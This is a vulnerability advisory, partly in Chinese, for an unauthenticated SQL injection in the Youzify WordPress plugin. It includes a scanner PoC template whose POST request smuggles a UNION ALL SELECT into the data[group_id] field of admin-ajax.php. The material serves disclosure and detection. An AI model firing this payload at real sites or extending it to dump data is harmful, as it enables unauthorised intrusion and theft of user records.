CVE-2022-1950: Wordpress Youzify sql injection

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection

PoC代码[已公开]

id: CVE-2022-1950

info:
  name: Wordpress Youzify sql injection
  author: xpoc,小z
  severity: critical
  verified: true
  description: |-
    The Youzify WordPress plugin before 1.2.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection
  reference:
    - https://wpscan.com/vulnerability/4352283f-dd43-4827-b417-0c55d0f4637d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1950
  tags: wordpress,cve2022,cve,sqli
  created: 2023/06/23

set:
  rInt0: string(randomInt(4000, 70000))
rules:
  r1:
    request:
      method: POST
      path: /wp-admin/admin-ajax.php
      body: action=youzify_media_pagination&data[type]=photos&page=1&data[group_id]=1 UNION ALL SELECT (SELECT md5({{rInt0}}) from wp_users),2,3,4-- -
    expression: response.body.bcontains(bytes(substr(md5(rInt0), 2, 28)))
expression: r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-1950.yaml